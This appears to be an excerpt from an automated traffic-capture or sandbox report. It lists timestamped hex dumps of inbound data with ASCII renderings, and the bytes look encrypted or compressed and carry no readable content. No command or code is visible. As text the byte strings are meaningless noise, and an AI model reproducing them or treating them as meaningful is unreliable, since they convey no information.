                                                                                                                                                  2022-11-15 17:54:38 UTC3195INData Raw: 18 cf 53 e7 4e 6f e9 60 11 b2 0c f9 39 99 18 a8 36 fe 2a 91 7a 50 b6 a4 71 01 a5 14 5f 37 3b 2b 44 c2 98 01 91 3d 54 43 b0 c8 63 0a 08 50 b0 46 e0 aa 70 04 6e c8 0c 54 c2 88 44 11 41 5a 6e d0 77 82 e1 1d 10 06 b7 44 16 aa 6f f8 16 43 d2 18 57 f1 d1 03 76 28 d6 15 86 3d bb 8d c8 73 c0 8c 4e 1c 06 03 18 b8 3c 21 d5 05 a8 50 c8 9f 77 29 ec 2b ac 30 04 5c 2a b4 0e c0 e2 26 c9 40 65 61 e0 09 39 e8 ab 30 7a 5f 2e fa a1 23 0e ff 69 db f6 8c 08 df bd 18 98 9e 3a 0c af 73 65 4e fd 89 ae 85 8f ba f3 71 00 9a dc fa 52 a1 8e 3d 9d fe b2 81 12 b7 55 d8 18 80 31 31 6e 83 9f d2 42 07 af 39 7b de 97 61 ca 7c 1a c3 00 04 ee 3d e4 f4 69 eb 4c 03 af 44 46 64 3e 79 18 42 2e 07 62 a1 77 00 6f 4f 29 bb f2 ff e9 28 01 ab d4 0e 98 09 02 83 2a ad f1 30 8b bc 68 95 08 a8 8e 4f 62
                                                                                                                                                  Data Ascii: SNo`96*zPq_7;+D=TCcPFpnTDAZnwDoCWv(=sN<!Pw)+0\*&@ea90z_.#i:seNqR=U11nB9{a|=iLDFd>yB.bwoO)(*0hOb
                                                                                                                                                  2022-11-15 17:54:38 UTC3211INData Raw: fa 25 e3 11 31 db 31 90 af aa 55 14 3b 9c a0 42 01 f0 74 0c c9 d8 b2 95 6e 68 27 8b 30 c6 ab 72 c2 49 eb 0e c4 e9 1f e3 91 4d 36 c2 29 d1 b9 67 ce 25 58 09 b7 94 87 b0 67 37 8b 03 6a 24 f9 f2 c0 7d 4a c7 8b eb 5e bb 7c 67 0a e1 c2 32 d7 d3 cf e7 04 0e 11 c8 36 90 06 5a bf 7c a4 3f e4 36 97 6c 71 59 c6 be 8c 0e 06 37 90 e5 9d 7d 92 f2 66 c5 c5 1c cf 9c 01 b5 b8 46 4b 2a 6b 62 0d bb b4 80 2d 03 30 fb 37 b4 3c af 24 4f fa 8a 01 27 5f 5d 32 d1 29 3b fd e5 18 90 7c 70 b7 1c e9 98 18 9e ee 52 f7 c5 47 82 a5 09 4f 23 5e 0f 02 35 d7 e7 1e d9 0b 44 07 ab a8 a3 b2 ee c2 31 52 16 2d fe 06 5b 04 3f 92 29 d8 ba 25 67 ae 04 b3 f6 28 ec 83 a2 f7 d5 c5 69 a0 8d 9d 5f 16 08 f8 01 9e e7 cd 24 3f f6 49 5f eb 24 91 be cf 69 2e c6 5e e2 e3 04 2f ce f3 d6 62 07 e6 82 34 01 f6
                                                                                                                                                  Data Ascii: %11U;Btnh'0rIM6)g%Xg7j$}J^|g26Z|?6lqY7}fFK*kb-07<$O'_]2);|pRGO#^5D1R-[?)%g(i_$?I_$i.^/b4
                                                                                                                                                  2022-11-15 17:54:38 UTC3223INData Raw: a5 c2 d1 fe 75 69 0b 39 5d 65 e0 25 f0 00 4a f1 a6 e7 17 33 18 28 89 01 5a 1a bc 52 b0 42 d6 39 4f 29 bc c1 f2 63 3a d6 cd 58 be d3 12 43 ba 4c 8a 6f 2b 33 9b 44 1a 22 3b 14 95 df 89 ed 5e e4 59 6b 2a 32 01 1e d5 6e 10 26 31 1a 51 2d f9 0f 4f 24 e7 cd 14 33 00 7a 47 63 60 31 08 bf 95 7e a9 59 40 6d 67 c4 b3 a3 16 63 82 05 cc aa 76 a2 20 9f 54 00 50 08 18 27 b9 01 94 b6 f4 df b5 80 48 eb 31 c6 21 6b c9 6a dd 16 74 b7 de 82 52 c6 58 2d 21 c1 52 62 9d df b2 20 7d b2 5d 7d f1 4b 62 c3 0e dc ee 52 5f d3 68 07 31 c7 09 29 57 66 68 9b 30 a4 65 12 be 8d b1 30 c8 38 05 b5 86 77 31 de e2 b9 82 c2 01 19 89 81 59 89 af f7 88 54 af 27 dd 39 c6 01 c3 84 33 d2 c8 d8 31 da 09 09 cf 8b 18 76 6d 12 f7 bf f2 b5 d6 fa cd 70 3b 32 dd 01 5f 74 80 c5 ce fb 74 ae f6 93 16 c1 10
                                                                                                                                                  Data Ascii: ui9]e%J3(ZRB9O)c:XCLo+3D";^Yk*2n&1Q-O$3zGc`1~Y@mgcv TP'H1!kjtRX-!Rb }]}KbR_h1)Wfh0e08w1YT'931vmp;2_tt
                                                                                                                                                  2022-11-15 17:54:38 UTC3227INData Raw: 16 ad 51 c7 0c 7a ad 85 8c 33 60 d8 27 31 d0 5b 14 89 ce 1f 94 af 27 25 28 e5 f1 2f 66 5a b5 db 36 16 f8 f2 53 8b cf 7f e6 b9 b6 00 67 21 f9 f4 c9 c5 f8 dc 1b f7 b1 e1 c9 89 ac c6 c7 4b d7 fe 66 88 8c 4f 25 29 e9 2e b8 55 2d 33 d7 13 47 14 89 e7 28 d4 a3 31 03 92 ea 15 02 b2 2e 25 a2 21 8b 31 09 24 44 aa 25 31 ff 5f 6c 19 29 01 d6 a7 89 31 c6 66 42 95 d3 67 34 24 ff 39 f5 6b e1 00 3a b8 47 b4 17 91 f8 7c b4 a1 4a 7e 29 6a 2a bc 98 c9 bb 54 5d 5a 59 fa 64 0b 44 21 db cd 25 2e ae 32 da 20 7e 2c 68 95 2d d0 72 90 54 86 8b 39 c2 09 4e 34 51 01 b2 01 db 2b 37 66 38 2d ef dd ba 4b 29 98 59 e1 89 f2 40 e5 1d 12 0d fc 96 a4 fb f0 41 21 4a c9 84 9b b7 96 16 01 37 f9 4d 84 cb 20 ab 29 71 3f a7 d8 4a c4 7e 2c a4 e9 a1 19 05 ee d6 f4 51 09 2e eb 32 99 29 7f e8 ec cf
                                                                                                                                                  Data Ascii: Qz3`'1['%(/fZ6Sg!KfO%).U-3G(1.%!1$D%1_l)1fBg4$9k:G|J~)j*T]ZYdD!%.2 ~,h-rT9N4Q+7f8-K)Y@A!J7M )q?J~,Q.2)
                                                                                                                                                  2022-11-15 17:54:38 UTC3243INData Raw: 6e 27 4e bf bb dd ca 60 aa 09 48 d7 9a a2 2d 5e 5a 62 21 c0 fe d8 6b d7 66 27 5e 19 35 4f e5 d8 7a b3 d1 92 e9 7c 4f ff 29 22 7a 73 26 e2 ca 95 5d 98 15 f7 e4 b0 48 07 bb 20 88 c2 a6 00 8c 17 05 43 97 11 1d c7 83 06 e4 0a 6e cc 00 24 16 4b f6 ff c0 7c 12 0e 5f 61 3e 60 4c 11 2a 93 4c 0c 80 00 e6 2e 09 16 af 31 35 09 05 33 f8 6f 76 1f a5 5a 0f 2d d9 14 fc c3 64 41 bb 00 2c c5 6b 5e 6a cc 0e b0 23 78 0d 62 8a 7a 17 df 10 ec 46 05 73 93 df aa 5b ae 18 06 3c 75 5a b0 2c 50 28 cf bc b4 30 d3 1f 10 b7 f8 0f 90 04 79 77 4b 13 99 91 80 04 8c 1b 82 46 b9 0a dc 28 aa 0e c6 2c 5c 84 1a 06 06 e9 63 1f 19 1d 33 a4 a0 2c 27 14 4e 80 c4 2b 78 c1 05 1e bd fb ff 81 fc f5 6f b8 62 9d 11 d4 8b 60 eb c3 01 f1 55 06 d7 b4 de 1d 99 1c 9c 3e 49 83 4c e9 21 81 1e 69 0a d8 00 93
                                                                                                                                                  Data Ascii: n'N`H-^Zb!kf'^5Oz|O)"zs&]H Cn$K|_a>`L*L.153ovZ-dA,k^j#xbzFs[<uZ,P(0ywKF(,\c3,'N+xob`U>IL!i
                                                                                                                                                  2022-11-15 17:54:38 UTC3259INData Raw: fc a0 b5 12 55 3d 03 33 10 5e 09 4c c0 5d 4c c2 91 51 21 ae ae c0 92 d7 ea a7 83 5a c8 5d 09 4b c6 bf 65 65 fc 64 a0 21 f6 2b 74 11 7c c0 25 e6 1c c5 ea a7 f7 98 12 f0 09 e5 3e f9 af 97 17 d4 fc 0d a5 17 10 fe 08 c3 e8 cb 89 1c ce a5 b0 95 a2 84 55 73 aa 3c 25 ef 54 28 71 c3 50 29 33 2d ae 09 95 77 31 f9 94 7d 9c f3 4b 76 4c 82 8b 0f 86 10 5e cf 51 29 3a c0 e2 5a fe 09 72 6b 4e d9 e8 ec c4 01 d1 b1 15 3a b8 d8 e5 c4 b7 bf 28 40 0a 0b f1 7a 35 7d c5 75 11 eb 23 c3 17 06 b3 ce 4e fa 67 a4 a9 50 74 97 51 cd 97 bf ef 39 2c 68 45 89 cb f3 19 35 8c eb 98 79 f9 9f f6 31 72 77 e6 1b b5 d9 1b 9a c0 be f6 9e 45 05 f3 8d 75 8a 4a 34 f3 a5 22 35 09 31 c0 09 db 05 a7 3e 20 50 e9 21 de 98 ae 9f 56 57 71 e3 51 38 c3 28 11 2b 39 ac 11 44 50 01 f3 9f 32 fd dd 89 b9 57 d1
                                                                                                                                                  Data Ascii: U=3^L]LQ!Z]Keed!+t|%>Us<%T(qP)3-w1}KvL^Q):ZrkN:(@z5}u#NgPtQ9,hE5y1rwEuJ4"51> P!VWqQ8(+9DP2W
                                                                                                                                                  2022-11-15 17:54:38 UTC3275INData Raw: ab 09 46 a4 42 bf 55 14 59 39 89 c6 2f da dc d9 e5 c2 52 21 85 21 b9 0f d3 16 77 a8 77 d2 92 5d fa 5c 42 c4 e6 a2 e4 4e e8 2b 05 c2 2d 94 36 e8 3d df 96 f6 ab 99 42 e9 fa 2b 04 2e ef 1c 27 8b 7b e5 08 c3 aa 84 66 31 0b fe 02 83 ee 29 da 75 74 1e ca 56 2f e5 ab 27 7e 78 c5 f7 8c 2f c8 bd b2 91 fc 88 25 db d4 a4 5c 8e ee ae 2f 63 77 c5 a5 a2 f6 cb ca f5 4e 52 95 02 b9 29 d2 d8 78 9f c5 d1 92 d3 c9 80 3b 4b 9c 35 c6 22 60 80 0d 29 fb 01 31 d2 a0 f8 40 b1 21 ca f1 ce 66 ee 0b 29 fe be f6 49 58 89 f2 f8 fa b7 9a 72 df 41 29 cf 76 51 4e ee 9d bf 7b 99 7e 7b 62 5c ef 7f d1 4d 48 9b 25 ff e5 36 25 0b e6 14 f9 9f 5d 0b ff 39 36 ca 52 63 ea 71 b0 a5 96 82 9c da ed 76 2e f9 76 d2 c9 6b 28 c6 d6 94 da fa 72 ea f2 55 e5 ae a5 7f 99 2d c9 23 fa 1f d2 03 54 09 a6 27 d9
                                                                                                                                                  Data Ascii: FBUY9/R!!ww]\BN+-6=B+.'{f1)utV/'~x/%\/cwNR)x;K5"`)1@!f)IXrA)vQN{~{b\MH%6%]96Rcqv.vk(rU-#T'
                                                                                                                                                  2022-11-15 17:54:38 UTC3291INData Raw: 94 9a 76 59 19 8e 93 56 5a 3d 05 a4 10 f3 27 77 b2 10 b2 73 de a2 39 d8 31 4c 71 4d 7d df 85 c7 31 0a b2 96 c1 0e d6 60 0c 3b be 38 0a 86 b1 71 40 95 d5 aa 46 b1 02 45 66 c4 d9 ba a9 b2 e6 68 97 55 1d b4 02 80 3e ee 3b 5d dc 59 f2 fd 72 9e 2c 29 fe 87 14 c7 1e 2f bf 9d fb 99 3b 4a 5e 7f e2 f8 d3 f2 41 93 f9 d5 90 4d 22 15 3d 01 0a 2f 3e 30 68 03 38 95 ef 1c 10 18 b3 1e d2 f7 9a 1c e4 72 2c 31 c2 6e 09 21 fa 22 00 c9 80 f9 4f 69 1a a8 7d fa 27 f6 ea 9c 16 59 f1 6e 28 6b 8b 4e 30 f7 62 27 ba c5 74 2f f5 16 c4 95 1a 25 de 83 12 f8 dd 15 2f 05 12 cf 1c 67 2a d4 c0 ee 8c fb 03 4a 33 bc a0 27 ef 5e 62 5b 5a 5a 34 a4 bb f3 b4 0a d2 ba 0a 57 e2 09 33 d5 10 a5 cf 40 b6 9d 59 c3 50 39 0b fa ea 29 b0 2f 45 2d f6 bd 19 d8 49 e1 3b ea 35 47 fe cc e9 f2 04 29 c8 31 33
                                                                                                                                                  Data Ascii: vYVZ='ws91LqM}1`;8q@FEfhU>;]Yr,)/;J^AM"=/>0h8r,1n!"Oi}'Yn(kN0b't/%/g*J3'^b[ZZ4W3@YP9)/E-I;5G)13
                                                                                                                                                  2022-11-15 17:54:38 UTC3307INData Raw: 50 9e e0 d6 3a a9 31 b0 08 d1 dd 93 b1 51 e8 72 80 80 bd 06 89 d9 8e 36 03 f2 1d 5d 70 f5 ff f6 bd 25 df f4 a2 2f 04 0e 8f 68 05 7f 13 35 84 ef 12 28 e2 c2 90 ac 86 f2 86 2c 3e 76 e7 12 2a 07 34 12 12 46 e4 f6 d1 18 47 dc fd 44 96 23 30 a8 0c 0c 76 26 0e c0 39 f2 80 03 64 52 4e a5 5e 03 41 7b a3 22 0c 7d 40 60 17 f4 1c 03 28 b4 75 66 a4 a6 12 91 fa 6c 20 72 82 85 67 03 60 cc 01 cd 48 f1 b8 d5 69 f6 06 f8 86 f2 d2 21 28 3a 75 8c 26 5f 4a 18 19 46 10 c2 20 a1 22 3d 13 55 a6 83 90 18 bb 7c d8 cb 63 67 1c 17 bd 3f a6 79 05 ea 2b c4 06 00 f3 37 92 66 cc 87 14 3a fc ae a9 00 0c 74 5b 93 31 42 28 00 05 32 3f 4e 87 43 7e 33 c9 4e 30 f8 4b 84 9a 30 fb 95 08 9b 01 fc 61 90 18 96 e5 6e c4 07 16 27 79 43 68 0f 26 13 70 09 48 95 cc c7 da db e0 cc a9 42 bb 63 93 28 ef
                                                                                                                                                  Data Ascii: P:1Qr6]p%/h5(,>v*4FGD#0v&9dRN^A{"}@`(ufl rg`Hi!(:u&_JF "=U|cg?y+7f:t[1B(2?NC~3N0K0an'yCh&pHBc(
                                                                                                                                                  2022-11-15 17:54:38 UTC3323INData Raw: 5b 7a 90 cb d0 d5 de 95 ff 85 84 21 df ff d8 54 f3 5a 40 2c 8b 30 97 db 49 94 aa 3d 25 ce 20 e9 4a 2d 57 1c 25 31 d7 9a 65 57 7e d3 1e c6 d6 f7 be 2c 05 cf 84 50 66 c7 6b 4b ec 24 95 c1 14 31 f6 3c 22 7f 75 66 25 11 9c d3 d1 e9 a2 0d 01 ea 55 dc 61 40 e2 42 f2 34 2d 22 ba 6f 9b 92 0e f9 de c9 5f d6 a5 20 a5 5f e6 fe 77 15 d4 f9 d9 e3 35 9d 31 6c 3a 29 76 04 92 ea cb 6e 7b bf 56 b1 52 f9 45 b8 4a eb 64 c3 48 24 14 45 f6 8c 0c f7 09 01 d6 8a 10 7e 86 44 5c e9 95 d6 2d 1e 38 28 c4 e6 20 ca f0 53 bf 12 05 12 2d 74 2a bc 3c 27 de db d0 27 19 90 89 fe 6c 2f 9f 5a cd 50 0d 18 fe e4 c9 b5 f3 8b 0b d9 5b 39 22 c6 d6 d6 93 52 49 18 f7 6e fc ba a0 29 de b0 5a 40 af 29 70 78 f3 96 fa 8a c0 4e fa 41 37 30 01 21 d2 2b 8c c6 29 ed 3e f2 a8 2f ce df bb 47 ac eb a8 89 a5
                                                                                                                                                  Data Ascii: [z!TZ@,0I=% J-W%1eW~,PfkK$1<"uf%Ua@B4-"o_ _w51l:)vn{VREJdH$E~D\-8( S-t*<''l/ZP[9"RIn)Z@)pxNA70!+)>/G
                                                                                                                                                  2022-11-15 17:54:38 UTC3339INData Raw: 1e 9d 00 28 9b 33 3c 77 df de 74 c0 b1 53 1a 6a f6 18 00 29 bb 2b b5 7a ab 89 cd 01 db b2 da ad ee 94 b8 2d c8 09 a9 9f a2 58 e7 25 0d 0a d1 ca 0c 40 fc 26 d9 18 f2 e5 43 8a 7a f0 31 2a 4c 20 1b 51 2e 90 fe b3 da 79 00 14 d2 39 76 f6 2b ad df 1c 8b 3b 15 06 13 6d 43 2b bd f6 c6 40 fd d0 8a 27 09 38 2f 7f f1 70 49 0c 64 ee 53 17 2a 30 18 49 85 a6 39 47 05 1c 37 44 14 04 69 76 61 ba f8 f7 80 88 98 23 85 53 18 34 0c 75 18 b3 fd 30 9d 76 58 e7 a7 db 30 9b 2c 36 73 ec 02 a4 82 4f e4 a3 64 64 4e c7 af d8 29 bc 40 54 50 c0 73 d4 8c f3 ff 73 9c 5c 0e 90 f0 f6 fc cb e8 6a 50 0a 16 54 2f 14 f4 f4 6c ce 54 1e f1 b2 15 89 14 4c 70 c8 64 b8 3b 00 c2 4d ca 3a 7c 13 39 87 7a 78 28 77 5c 1c 24 d3 90 9f 00 8b 21 55 0b d1 e3 0d 80 f6 be 22 be 98 5d 95 84 65 70 1f 7f 94 42
                                                                                                                                                  Data Ascii: (3<wtSj)+z-X%@&Cz1*L Q.y9v+;mC+@'8/pIdS*0I9G7Diva#S4u0vX0,6sOddN)@TPss\jPT/lTLpd;M:|9zx(w\$!U"]epB
                                                                                                                                                  2022-11-15 17:54:38 UTC3355INData Raw: b4 ec 20 d2 b8 89 cb 11 80 2f 90 0f 86 0d 95 66 15 0f ef 2c 9c 60 6b 2d d5 ce 0c b7 12 72 fd 51 c4 a5 30 e4 c2 aa 95 32 e1 10 ab 66 31 4a 3a e2 a0 c4 89 f2 dd 32 d9 b8 7e 2c 37 25 49 40 ae cb 20 73 14 a7 5f 32 86 04 48 29 be cc 22 09 5b f7 d8 0f c3 4e 8a ca c4 51 4c 63 0f 89 cf 5e 4a 2f 6c 4f 22 f1 24 27 21 c1 7d 46 40 4b d9 b3 1d 43 b1 5f 4b f9 f1 f1 5c 62 01 eb 76 4e 66 66 d4 58 70 96 25 ee 5c b5 61 21 f8 31 70 37 1b 2a 38 1e a9 bf 3b ce a2 f7 cc c1 d3 10 ee dd 68 04 d8 fe 65 54 fe b2 58 92 c4 26 b2 e1 8b 01 ab af 75 6c d0 56 24 de 5b cd f7 4d 50 2f f6 38 d2 57 54 74 d0 ab 82 b3 c9 59 1d 87 1b 09 ce d4 c6 ab 34 42 bb f9 ed 89 ee b3 18 92 f7 dd 3a e8 59 95 1f c7 9e c9 27 14 3e 58 29 ff 18 fe 21 88 f3 7d 09 67 db 19 b9 d5 e5 9c 9e ea 09 e1 1f f9 48 6b 58
                                                                                                                                                  Data Ascii: /f,`k-rQ02f1J:2~,7%I@ s_2H)"[NQLc^J/lO"$'!}F@KC_K\bvNffXp%\a!1p7*8;heTX&ulV$[MP/8WTtY4B:Y'>X)!}gHkX
                                                                                                                                                  2022-11-15 17:54:38 UTC3371INData Raw: 12 f7 09 c7 12 16 84 f7 b7 a2 51 71 3a 8a 10 62 0d c6 b8 65 f2 89 d9 29 dc 86 13 0d b3 58 77 b5 e5 f4 ae 33 ee d4 69 05 09 c1 0d 20 b3 8f 5e 31 c7 29 f7 31 5b 3b f3 f8 d6 31 4f 01 c8 82 40 75 1e b3 29 7e 63 2d e7 7b 8b ca 0d 5d 14 91 2d 01 1f 66 b8 80 39 21 c0 be a8 c8 9d 4b c2 a2 32 cc 42 80 dd 9a 18 d7 24 57 e7 bf f2 4a 84 29 c9 c4 a3 25 57 bf b0 41 0e 9d b8 fc 8b 32 c9 cc 2d d5 65 e8 25 dd c1 50 bb c2 56 1e 76 bd c5 2f 47 06 0e 11 93 eb b6 77 43 9b 02 b8 1a 8b c9 4f 55 94 ff b3 a8 8b 01 03 5e f0 e9 d1 56 79 0a 0a 93 f2 57 8b f7 53 61 64 7b 50 d7 17 2b 1e b3 9b 78 1c 32 39 31 93 1f b2 71 89 e6 51 54 42 31 c8 d7 39 8d e3 78 35 c8 0e a5 5f 99 77 17 3e f5 be bf 68 2d 20 14 3b 29 21 d0 f2 89 2b 17 df 59 e9 b4 20 99 5b 2e ef 09 c5 67 1e 87 9d 99 a0 17 c9 d3
                                                                                                                                                  Data Ascii: Qq:be)Xw3i ^1)1[;1O@u)~c-{]-f9!K2B$WJ)%WA2-e%PVv/GwCOU^VyWSad{P+x291qQTB19x5_w>h- ;)!+Y [.g
                                                                                                                                                  2022-11-15 17:54:38 UTC3387INData Raw: f8 81 b0 2b 33 01 4b d1 b3 cc 2e 0d 4a 60 f6 09 df 93 2f 14 b9 d5 19 52 cf 6f 32 cd 02 89 45 09 46 4c ac a2 eb f4 3f 59 d7 51 44 29 33 2e 98 07 d9 e4 f1 97 78 5c 29 0d 24 ea 48 05 97 2d c8 68 f2 2c 31 d9 49 69 d8 eb 80 e6 c7 20 bd 9e 62 8b 61 e2 0f 5f 14 4f bd b0 ff e7 1f a8 62 8b 10 b4 56 cb 09 7c 7c 91 5a 63 42 4b 9a 29 2c 3a aa 12 38 ee f7 70 5e b9 5c 8b 11 f5 ce 9d bc d0 44 16 ab bd 77 c9 38 77 97 41 1c 14 38 47 96 da 33 5a 73 bd c3 51 66 8a 36 36 17 0b 01 8c 46 39 5e 03 25 48 ea 2a fe 38 04 70 8c 97 71 92 f2 d1 6f 40 06 ba 5a 59 4a 41 e7 fd 5b fe 33 82 1a cf e1 5d 15 2c c6 c2 60 51 8e 51 08 0a 4e f8 8d a5 bc ae 5e 8d 86 65 d8 6a 3d 97 08 0e 12 8a dd 31 41 ca 2b 32 8e 1e b2 9c 7e bd ac c5 7b c4 ba 84 5b 95 7b bb ca 96 12 31 ff 60 3c 2b 1e 01 72 c9 b7
                                                                                                                                                  Data Ascii: +3K.J`/Ro2EFL?YQD)3.x\)$H-h,1Ii ba_ObV||ZcBK),:8p^\Dw8wA8G3ZsQf66F9^%H*8pqo@ZYJA[3],`QQN^ej=1A+2~{[{1`<+r
                                                                                                                                                  2022-11-15 17:54:38 UTC3403INData Raw: 04 e4 49 86 ff 12 6e 06 85 d0 21 28 f3 81 3e bb 92 a9 a6 50 20 f9 95 e4 26 31 6d 8b 1c 06 01 2e f3 d3 3f 65 8f e0 71 4a ac 12 19 38 26 3b 44 03 84 fa 9a 14 80 ce f7 34 6e 60 50 a3 70 2b 49 b0 83 c6 05 de be 40 c5 c4 02 fb 26 69 38 28 0c 76 c3 1e 04 cd 08 41 63 23 8a 0c 9c 9b 1f 00 89 06 f4 ff 18 1c 3d 24 80 31 57 1c 1e 7f dd 6d 92 0c fa a0 3e d7 1c 4d 96 2a 06 46 ae 5b 0d fe 6a 07 bb 03 b4 0d 10 07 27 63 81 62 e1 ff 22 60 b7 9e 13 52 ed 95 a0 1c 2d 38 a3 09 50 64 e6 2a b0 fb c5 14 fd 94 95 70 d2 d4 f6 fe 8b 3f c4 a4 0b 18 0c 88 8c 3c f8 ff 70 f5 5b 1e 63 14 18 f6 12 24 22 35 00 0f 9a 7b 2a 02 84 03 fd 01 9f 46 2b 45 9b 54 85 01 d2 49 d8 1c 81 83 48 da ff 51 35 06 f8 fb a9 84 57 58 02 64 50 fc 75 ba c9 43 d6 e0 bd 69 c3 63 43 81 3c ec 0a 9c a4 9d 0d 46 b0
                                                                                                                                                  Data Ascii: In!(>P &1m.?eqJ8&;D4n`Pp+I@&i8(vAc#=$1Wm>M*F[j'cb"`R-8Pd*p?<p[c$"5{*F+ETIHQ5WXdPuCicC<F
                                                                                                                                                  2022-11-15 17:54:38 UTC3419INData Raw: 25 0d 24 c6 fa 4a e9 ab d8 4a 29 5f d6 b0 eb ef b9 de 62 8b 09 5f 31 86 df 7f cc 64 35 a0 05 09 f8 9c e0 e5 19 ab 04 42 d6 bf af ec 6a b1 e9 05 3a af 28 30 2b 7f 19 5b c8 64 4b ef b6 f3 4a f0 3f f6 97 76 6a ef 6b e7 f7 65 4a 8b c1 67 14 08 07 09 f6 89 d7 29 2b 18 61 03 19 9d cc fa 5f df 9c 1d c6 f6 c7 ac 91 54 b9 2b 18 25 29 f6 32 57 29 15 55 fb a5 bf 5d 7e 8a 05 07 9f de c0 30 35 7d eb 63 be 9f 57 16 10 bd 20 fb 0d 0f 86 1d ac fd 48 d1 25 04 03 94 6a 3c c5 c7 fe e2 6f d2 98 db ef b7 fb 02 0a c9 1f 4a 93 b8 b2 dd d2 ab c8 20 fa 2d 09 d6 f8 e7 9f 3e e0 b7 7c 77 51 29 ea 5d 56 c0 fa 89 d6 fb 62 af 5c 82 c9 55 c8 9a 09 f1 2d 39 02 df bc 19 c9 36 32 7e 6c 7a 11 13 39 58 4f 33 56 3b 65 7a 78 32 25 f7 1c 65 58 2f 74 68 ba 27 f8 fd 33 30 f1 f0 be 7b 2d d3 2a 61
                                                                                                                                                  Data Ascii: %$JJ)_b_1d5Bj:(0+[dKJ?vjkeJg)+a_T+%)2W)U]~05}cW H%j<oJ ->|wQ)]Vb\U-962~lz9XO3V;ezx2%eX/th'30{-*a
                                                                                                                                                  2022-11-15 17:54:38 UTC3435INData Raw: 61 c0 36 b9 11 64 89 09 c0 43 2e 8b 8e 12 d3 5e 3f f4 40 8f 00 af 1c 69 95 73 9b 08 3c 1d 28 c6 4f 86 e3 9c 3d 48 00 40 26 cf 97 ea f1 e6 c4 70 06 2f 57 9d 6b 10 06 04 15 5c 69 24 0c 01 82 62 aa 9a a1 6d 03 b0 69 ce cb 58 68 0c ff 0b 7d 08 39 1c c3 05 04 55 d4 f5 06 2a 45 b3 34 07 a7 65 73 9a 0d 80 f3 48 37 47 17 2f ae bb b0 2c f7 24 d5 9d 08 60 7a 7b f8 ff 3b a4 e8 61 a6 02 e4 a0 70 b0 6e 2a 55 1c 48 fd 23 22 04 74 01 7c 7b c3 9f 1e 80 2b 50 0c 90 e4 4c 8a db 49 3b 9e 96 fb 29 56 e9 f3 2f 62 09 f2 7d 1a 5d d8 d2 b7 73 62 09 c3 01 14 a9 98 a5 98 5e 27 b9 0a 16 8d 25 c1 24 cc e6 97 2b 60 fc 0d 13 e1 64 ff af c4 f2 f2 4e c9 d6 de c7 c9 44 75 2e 2b 07 61 2f 7d b1 2e cb 6c af 9f ed f3 a8 03 d3 31 07 21 7c 36 bd 94 10 8b 4b e0 0b 93 54 2d 8a 0e ec 67 95 f9 e7
                                                                                                                                                  Data Ascii: a6dC.^?@is<(O=H@&p/Wk\i$bmiXh}9U*E4esH7G/,$`z{;apn*UH#"t|{+PLI;)V/b}]sb^'%$+`dNDu.+a/}.l1!|6KT-g
                                                                                                                                                  2022-11-15 17:54:38 UTC3451INData Raw: 0a da 01 ef 0a 4f 0a c2 bb c9 08 ba 31 43 29 c2 3a 7c 36 a5 d2 fe 48 0b 5e 70 e6 35 5b e2 d9 0f 11 1f 8b 36 af f0 d8 db 49 f0 c7 89 c6 64 67 9f 78 15 91 22 49 f5 fb c2 27 6c cc 25 c2 35 59 fe 4d 0c 3f b2 8e d2 9c 8a 66 f2 3a 9f 7b 02 14 fe 8f 42 1b 58 55 5e e8 7f 25 e6 19 33 10 3a a3 35 93 8d 54 7f ca 82 84 31 3a ef 12 8c 28 76 33 4a 39 32 4b 89 75 40 24 21 d6 ec f3 9d fb de 12 cb bf e3 ff 12 c7 01 9b 7e 5e e6 a6 43 80 5f a1 78 3e a9 7c 4a af 34 b5 a6 70 7e 44 80 31 12 ff 05 b8 ca 85 4e fe 8e 08 2e c2 8e c9 7f 3a fe 5f b1 f8 eb 44 42 c6 24 3c b7 54 8e e9 42 97 7f 84 01 ce ef e2 7e 89 e9 5b a8 08 f1 1f 82 01 d6 29 c9 55 c5 70 02 c2 0d 87 55 5f 73 ed 10 c7 92 eb e3 24 d1 3e 40 db 31 16 16 21 f1 74 bb ed 79 c5 31 cb f3 83 1c 21 d1 92 f3 f8 e2 13 e1 28 f2 68
                                                                                                                                                  Data Ascii: O1C):|6H^p5[6Idgx"I'l%5YM?f:{BXU^%3:5T1:(v3J92Ku@$!~^C_x>|J4p~D1N.:_DB$<TB~[)UpU_s$>@1!ty1!(h
                                                                                                                                                  2022-11-15 17:54:38 UTC3467INData Raw: 34 8b 82 00 8f 4c eb 63 73 a3 7e 6e 03 75 8d e4 37 c1 62 c8 df a6 69 60 77 2c ef 46 ee 34 91 0c 02 e7 27 f4 22 82 da 87 9d 4a 24 98 48 5a 2c 80 96 69 24 f2 70 ee 41 1e 92 0f c0 e3 dd f1 55 18 ad 4d 06 8b cd 04 24 0c 09 21 9d db 06 10 a9 7f cc 30 60 c1 30 e7 2d 11 98 d2 51 8a 2e ca 66 87 08 8e 31 c0 13 01 a8 bd 2e 62 a6 bc 1d 1d e9 42 e0 49 d5 7c 12 1d ec 06 61 16 75 10 31 5a 01 50 d6 05 00 b5 54 d4 06 b9 c4 1f a2 11 1c 16 a0 57 f5 42 74 30 ce a4 7b 85 93 18 ba 6d fc 6d 06 a7 70 16 2b 4f b8 e1 2f ce 3a 76 05 37 e4 67 9f 51 ef a2 ae 92 ac 28 a0 01 af 52 27 fa 57 55 92 62 57 da 2d 95 65 48 44 11 29 3e a7 15 69 cb fc 1c e8 08 01 be 4a d8 b9 6a 58 57 bf 0b e8 eb f7 38 77 65 91 92 fe fb f7 f5 13 c1 35 ec ea a4 ff a3 0f 25 db 74 84 2d df 8b c6 53 c1 88 c1 06 93
                                                                                                                                                  Data Ascii: 4Lcs~nu7bi`w,F4'"J$HZ,i$pAUM$!0`0-Q.f1.bBI|au1ZPTWBt0{mmp+O/:v7gQ(R'WUbW-eHD)>iJjXW8we5%t-S
